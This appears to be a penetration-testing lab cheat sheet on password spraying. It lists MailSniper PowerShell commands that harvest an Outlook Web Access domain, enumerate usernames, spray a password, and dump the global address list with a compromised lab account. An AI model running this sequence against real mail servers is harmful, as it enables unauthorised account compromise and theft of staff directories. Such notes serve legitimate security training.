Password Spraying

https://github.com/dafthack/MailSniper

Import-Module C:\Tools\MailSniper\MailSniper.ps1

Invoke-DomainHarvestOWA -ExchHostname 10.10.15.100

https://gist.github.com/superkojiman/11076951

/opt/namemash.py names.txt > possible-usernames.txt

Invoke-UsernameHarvestOWA -ExchHostname 10.10.15.100 -Domain CYBER -UserList possible-usernames.txt -OutFile valid.txt

Invoke-PasswordSprayOWA -ExchHostname 10.10.15.100 -UserList valid.txt -Password Summer2021

Get-GlobalAddressList -ExchHostname 10.10.15.100 -UserName CYBER\iyates -Password Summer2021 -OutFile gal.txt

Last updated